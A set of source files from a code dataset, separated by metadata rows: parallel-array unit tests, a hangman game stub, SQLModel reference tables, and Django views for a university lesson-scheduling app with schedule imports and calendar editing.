self.assertEqual(len(self.larr_2d.distribution), 2)
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.local_shape, (4, 16))
self.assertEqual(self.larr_2d.local_size,
np.array(self.larr_2d.local_shape).prod())
self.assertEqual(self.larr_2d.ndarray.shape, self.larr_2d.local_shape)
self.assertEqual(self.larr_2d.ndarray.size, self.larr_2d.local_size)
self.assertEqual(self.larr_2d.ndarray.dtype, self.larr_2d.dtype)
def test_localarray(self):
"""Can the ndarray be set and get?"""
self.larr_2d.ndarray
la = np.random.random(self.larr_2d.local_shape)
la = np.asarray(la, dtype=self.larr_2d.dtype)
self.larr_2d.ndarray = la
self.larr_2d.ndarray
def test_bad_localarray(self):
""" Test that setting a bad local array fails as expected. """
self.larr_1d.ndarray
local_shape = self.larr_1d.local_shape
# Double dimension sizes to make an invalid shape.
bad_shape = tuple(2 * size for size in local_shape)
la = np.random.random(bad_shape)
la = np.asarray(la, dtype=self.larr_1d.dtype)
with self.assertRaises(ValueError):
self.larr_1d.ndarray = la
def test_cart_coords(self):
"""Test getting the cart_coords attribute"""
actual_1d = self.larr_1d.cart_coords
expected_1d = tuple(self.larr_1d.distribution.cart_coords)
self.assertEqual(actual_1d, expected_1d)
actual_2d = self.larr_2d.cart_coords
expected_2d = tuple(self.larr_2d.distribution.cart_coords)
self.assertEqual(actual_2d, expected_2d)
class TestLocalInd(ParallelTestCase):
"""Test the computation of local indices."""
def test_block_simple(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (4, 4))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (1, 4))
row_result = [(0, 0), (0, 1), (0, 2), (0, 3)]
row = la.comm_rank
calc_row_result = [la.local_from_global((row, col)) for col in
range(la.global_shape[1])]
self.assertEqual(row_result, calc_row_result)
def test_block_complex(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(8, 2))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (1, 0), (1, 1)]
elif la.comm_rank == 1:
gis = [(2, 0), (2, 1), (3, 0), (3, 1)]
elif la.comm_rank == 2:
gis = [(4, 0), (4, 1), (5, 0), (5, 1)]
elif la.comm_rank == 3:
gis = [(6, 0), (6, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
def test_cyclic_simple(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10,), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (10,))
self.assertEqual(la.grid_shape, (4,))
if la.comm_rank == 0:
gis = (0, 4, 8)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 1:
gis = (1, 5, 9)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 2:
gis = (2, 6)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
elif la.comm_rank == 3:
gis = (3, 7)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
self.assertEqual(result, calc_result)
def test_cyclic_complex(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 2), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (4, 0), (4, 1)]
elif la.comm_rank == 1:
gis = [(1, 0), (1, 1), (5, 0), (5, 1)]
elif la.comm_rank == 2:
gis = [(2, 0), (2, 1), (6, 0), (6, 1)]
elif la.comm_rank == 3:
gis = [(3, 0), (3, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
class TestGlobalInd(ParallelTestCase):
"""Test the computation of global indices."""
def round_trip(self, la):
for indices in utils.multi_for([range(s) for s in la.local_shape]):
gi = la.global_from_local(indices)
li = la.local_from_global(gi)
self.assertEqual(li, indices)
def test_block(self):
"""Can we go from global to local indices and back for block?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.round_trip(la)
def test_cyclic(self):
"""Can we go from global to local indices and back for cyclic?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 8), dist=('c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_crazy(self):
"""Can we go from global to local indices and back for a complex case?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10, 100, 20),
dist=('b', 'c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_global_limits_block(self):
"""Find the boundaries of a block distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
answers = [(0, 3), (4, 7), (8, 11), (12, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
def test_global_limits_cyclic(self):
"""Find the boundaries of a cyclic distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('c', 'n'))
a = LocalArray(d)
answers = [(0, 12), (1, 13), (2, 14), (3, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
def test_bad_global_limits(self):
""" Test that invalid global_limits fails as expected. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
a = LocalArray(d)
with self.assertRaises(InvalidDimensionError):
a.global_limits(-1)
class TestRankCoords(ParallelTestCase):
""" Test the rank <--> coords methods. """
def round_trip(self, la, rank):
""" Test that given a rank, we can get the coords,
and then get back to the same rank. """
coords = la.coords_from_rank(rank)
# I am not sure what to expect for specific values for coords.
# Therefore the specific return value is not checked.
rank2 = la.rank_from_coords(coords)
self.assertEqual(rank, rank2)
def test_rank_coords(self):
""" Test that we can go from rank to coords and back. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(d)
max_size = self.comm.Get_size()
for rank in range(max_size):
self.round_trip(la, rank=rank)
class TestArrayConversion(ParallelTestCase):
""" Test array conversion methods. """
def setUp(self):
# On Python3, an 'int' gets converted to 'np.int64' on copy,
# so we force the numpy type to start with so we get back
# the same thing.
self.int_type = np.int64
self.distribution = Distribution.from_shape(comm=self.comm,
shape=(4,))
self.int_larr = LocalArray(self.distribution, dtype=self.int_type)
self.int_larr.fill(3)
def test_astype(self):
""" Test that astype() works as expected. """
# Convert int array to float.
float_larr = self.int_larr.astype(float)
for global_inds, value in ndenumerate(float_larr):
self.assertEqual(value, 3.0)
self.assertTrue(isinstance(value, float))
# No type specification for a copy.
# Should get same type as we started with.
int_larr2 = self.int_larr.astype(None)
for global_inds, value in ndenumerate(int_larr2):
self.assertEqual(value, 3)
self.assertTrue(isinstance(value, self.int_type))
class TestIndexing(ParallelTestCase):
def test_indexing_0(self):
"""Can we get and set local elements for a simple dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
for global_inds, value in ndenumerate(a):
b.global_index[global_inds] = a.global_index[global_inds]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_indexing_1(self):
"""Can we get and set local elements for a complex dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for i, value in ndenumerate(a):
a.global_index[i] = 0.0
for i, value in ndenumerate(a):
b.global_index[i] = a.global_index[i]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_pack_unpack_index(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
packed_ind = a.pack_index(global_inds)
self.assertEqual(global_inds, a.unpack_index(packed_ind))
class TestSlicing(ParallelTestCase):
comm_size = 2
def test_slicing(self):
distribution = Distribution.from_shape(self.comm,
(16, 16),
dist=('b', 'n'))
a = ones(distribution)
if self.comm.Get_rank() == 0:
dd00 = {"dist_type": 'b',
"size": 5,
"start": 0,
"stop": 3,
"proc_grid_size": 2,
"proc_grid_rank": 0}
dd01 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd00, dd01])
rvals = a.global_index.get_slice((slice(5, None), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((3, 16)))
elif self.comm.Get_rank() == 1:
dd10 = {"dist_type": 'b',
"size": 5,
"start": 3,
"stop": 5,
"proc_grid_size": 2,
"proc_grid_rank": 1}
dd11 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd10, dd11])
rvals = a.global_index.get_slice((slice(None, 10), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((2, 16)))
class TestLocalArrayMethods(ParallelTestCase):
ddpr = [
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
})
]
def test_copy_bn(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution, dtype=np.int_)
a.fill(11)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_copy_cbc(self):
distribution = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(distribution, dtype=np.int_)
a.fill(12)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_astype_bn(self):
new_dtype = np.float32
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d, dtype=np.int_)
a.fill(11)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_astype_cbc(self):
new_dtype = np.int8
d = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(d, dtype=np.int32)
a.fill(12)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_asdist_like(self):
"""Test asdist_like for success and failure."""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
b = LocalArray(d)
new_a = a.asdist_like(b)
self.assertEqual(id(a), id(new_a))
d2 = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
a = LocalArray(d)
b = LocalArray(d2)
self.assertRaises(IncompatibleArrayError, a.asdist_like, b)
class TestComm(ParallelTestCase):
def test_create_localarray(self):
# regression test for issue #144
dist = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
la = LocalArray(dist)
class TestNDEnumerate(ParallelTestCase):
"""Make sure we generate indices compatible with __getitem__."""
def test_ndenumerate(self):
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(d)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
| en | 0.795525 | # encoding: utf-8 # --------------------------------------------------------------------------- # Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc. # Distributed under the terms of the BSD License. See COPYING.rst. # --------------------------------------------------------------------------- Is the __init__ method working properly? Test basic LocalArray creation. Test basic LocalArray creation. Can the ndarray be set and get? Test that setting a bad local array fails as expected. # Double dimension sizes to make an invalid shape. Test getting the cart_coords attribute Test the computation of local indices. Can we compute local indices for a block distribution? Can we compute local indices for a block distribution? Can we compute local indices for a cyclic distribution? Can we compute local indices for a cyclic distribution? Test the computation of global indices. Can we go from global to local indices and back for block? Can we go from global to local indices and back for cyclic? Can we go from global to local indices and back for a complex case? Find the boundaries of a block distribution Find the boundaries of a cyclic distribution Test that invalid global_limits fails as expected. Test the rank <--> coords methods. Test that given a rank, we can get the coords, and then get back to the same rank. # I am not sure what to expect for specific values for coords. # Therefore the specific return value is not checked. Test that we can go from rank to coords and back. Test array conversion methods. # On Python3, an 'int' gets converted to 'np.int64' on copy, # so we force the numpy type to start with so we get back # the same thing. Test that astype() works as expected. # Convert int array to float. # No type specification for a copy. # Should get same type as we started with. Can we get and set local elements for a simple dist? Can we get and set local elements for a complex dist? Test asdist_like for success and failure. # regression test for issue #144 Make sure we generate indices compatible with __getitem__. | 2.47653 | 2 |
04_05_hangman_play.py | bolivaralejandro/prog_pi_ed2- | 26 | 6616835 | #04_05_hangman_play
import random
words = ['chicken', 'dog', 'cat', 'mouse', 'frog']
lives_remaining = 14
def play():
word = pick_a_word()
while True:
guess = get_guess(word)
if process_guess(guess, word):
print('You win! Well Done!')
break
if lives_remaining == 0:
print('You are Hung!')
print('The word was: ' + word)
break
def pick_a_word():
return random.choice(words)
def get_guess(word):
return 'a'
def process_guess(guess, word):
global lives_remaining
lives_remaining = lives_remaining -1
return False
play() | #04_05_hangman_play
import random
words = ['chicken', 'dog', 'cat', 'mouse', 'frog']
lives_remaining = 14
def play():
word = pick_a_word()
while True:
guess = get_guess(word)
if process_guess(guess, word):
print('You win! Well Done!')
break
if lives_remaining == 0:
print('You are Hung!')
print('The word was: ' + word)
break
def pick_a_word():
return random.choice(words)
def get_guess(word):
return 'a'
def process_guess(guess, word):
global lives_remaining
lives_remaining = lives_remaining -1
return False
play() | en | 0.681443 | #04_05_hangman_play | 3.660071 | 4 |
backend/project/app/core/reference.py | goodyttoor/tcl_v7 | 0 | 6616836 | from datetime import datetime
from typing import Optional
from fastapi import APIRouter
from sqlmodel import Field, SQLModel
router = APIRouter()
class Right(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Province(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Amphoe(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
province_id: int
name: str
class Tambon(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
amphoe_id: int
name: str
class Religion(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class National(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Occupation(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class MaritalStatus(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class AcademicDegree(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Allergy(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Vehicle(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Language(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Relationship(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class IdType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class FeedbackType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class VisibilityLevel(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Module(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
class ModuleFunction(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
| from datetime import datetime
from typing import Optional
from fastapi import APIRouter
from sqlmodel import Field, SQLModel
router = APIRouter()
class Right(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Province(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Amphoe(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
province_id: int
name: str
class Tambon(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
amphoe_id: int
name: str
class Religion(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class National(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Occupation(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class MaritalStatus(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class AcademicDegree(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Allergy(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Vehicle(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Language(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Relationship(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class IdType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class FeedbackType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class VisibilityLevel(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Module(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
class ModuleFunction(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
| none | 1 | 2.463511 | 2 | |
scheduler/views.py | MarynaSavchenko/zielbruks | 0 | 6616837 | <reponame>MarynaSavchenko/zielbruks
"""Views gathering point"""
import os.path
from datetime import datetime
from wsgiref.util import FileWrapper
import pandas as pd
from django.contrib.auth import authenticate, login as log
from django.core.files.storage import default_storage
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.template import loader
from django.utils.datastructures import MultiValueDictKeyError
from xlrd import XLRDError
import scheduler.import_handlers as imp
from scheduler.calendar_util import get_start_date, generate_conflicts_context, \
generate_full_schedule_context, generate_full_index_context_with_date, get_group_colors, \
get_rooms_colors, generate_full_index_context, generate_context_for_conflicts_report
from scheduler.conflicts_checker import db_conflicts, conflicts_diff
from scheduler.model_util import get_professor, get_room, get_group
from scheduler.models import Room, Lesson, Group, Conflict, Professor, Student
from scheduler.export_handlers import export_to_csv, export_to_excel
from .forms import SelectRoomForm, SelectProfessorForm, SelectGroupForm, \
EditForm, MassEditForm, LoginForm, ExportForm
def login(request: HttpRequest) -> HttpResponse:
"""Render the login page"""
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['login']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
if user.is_superuser:
log(request, user)
# Redirect to a success page.
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
context = {'error': "Incorrect login or password", 'form': form}
return render(request, 'login.html', context)
return render(request, 'login.html', context={"form": form})
context = {'form': LoginForm()}
return render(request, 'login.html', context)
def index(request: HttpRequest) -> HttpResponse:
"""Render the main page"""
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context['form'] = MassEditForm()
return render(request, 'index.html', context)
def index_specific(_request: HttpRequest, date: str) -> HttpResponse:
"""Render the main page with given date"""
date_as_datetime = datetime.strptime(date, '%Y-%m-%d')
context = generate_full_index_context_with_date(date_as_datetime)
form = MassEditForm()
context.update({'form': form})
return render(_request, 'index.html', context)
def upload_schedule(request: HttpRequest) -> HttpResponse:
"""Render schedule upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_schedule.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.parse_data(data, ext)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_schedule.html", context)
def upload_students(request: HttpRequest) -> HttpResponse:
"""Render students upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_students.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.import_students(data)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_students.html", context)
def show_conflicts(request: HttpRequest) -> HttpResponse:
"""Render the conflicts page"""
template = loader.get_template('conflicts.html')
context = generate_conflicts_context()
return HttpResponse(template.render(context, request))
def show_rooms_schedule(request: HttpRequest) -> HttpResponse:
"""Render the room schedule page"""
if request.method == 'POST':
form = SelectRoomForm(request.POST)
if form.is_valid():
room = form.cleaned_data['room']
room_number = room.number
room_lessons_query = Lesson.objects.filter(room=room)
room_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
room_number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in room_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(room_lessons_list),
'type': 'room',
'name': room_number,
'events': room_lessons_list,
'start_date': get_start_date(room_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "room_schedule.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "room_schedule.html", context={'form': SelectRoomForm()})
def show_professors_schedule(request: HttpRequest) -> HttpResponse:
"""Render the professor schedule page"""
if request.method == 'POST':
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
professors_lessons_query = Lesson.objects.filter(professor=professor)
professors_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
Room.objects.filter(id=q.room_id)[:1]
.get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in professors_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(professors_lessons_list),
'events': professors_lessons_list,
'type': 'professor',
'name': professor,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(professors_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "professors_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors_scheduler.html", context={'form': SelectProfessorForm()})
def show_groups_schedule(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
groups_lessons_query = Lesson.objects.filter(group=group)
groups_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
group,
Room.objects.filter(id=q.room_id)[:1].get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in groups_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(groups_lessons_list),
'events': groups_lessons_list,
'type': 'group',
'name': group,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(groups_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "groups_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "groups_scheduler.html", context={'form': SelectGroupForm()})
def show_schedule(request: HttpRequest) -> HttpResponse:
"""Render the schedule page"""
context = generate_full_schedule_context()
return render(request, "full_schedule.html", context)
def edit(request: HttpRequest, lesson_id) -> HttpResponse:
"""Render the edit page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=form.cleaned_data['id'])
lesson.name = form.cleaned_data['name']
professor = form.cleaned_data['professor'].strip().split()
lesson.professor = get_professor(professor[0], professor[1])
lesson.room = get_room(form.cleaned_data['room'])
lesson.group = get_group(form.cleaned_data['group'])
lesson.start_time = form.cleaned_data['start_time']
lesson.end_time = form.cleaned_data['end_time']
lesson.save()
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
lesson = Lesson.objects.get(id=lesson_id)
form = EditForm(
initial={'id': lesson.id, 'name': lesson.name, 'professor': lesson.professor,
'room': lesson.room, 'group': lesson.group,
'start_time': lesson.start_time, 'end_time': lesson.end_time})
return render(request, 'popup.html', context={"form": form})
def create(request: HttpRequest) -> HttpResponse:
"""Render the create page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
professor = form.cleaned_data['professor'].strip().split()
professor = get_professor(professor[0], professor[1])
room = get_room(form.cleaned_data['room'])
group = get_group(form.cleaned_data['group'])
Lesson.objects.get_or_create(
name=form.cleaned_data['name'],
professor=professor,
room=room,
group=group,
start_time=form.cleaned_data['start_time'],
end_time=form.cleaned_data['end_time']
)
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
return render(request, 'popup.html', context={"form": EditForm()})
def remove(request: HttpRequest, lesson_id) -> HttpResponse:
"""Remove event and redirect to index page"""
try:
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=lesson_id)
lesson.delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return redirect('/calendar/')
except Lesson.DoesNotExist:
return redirect('/calendar/')
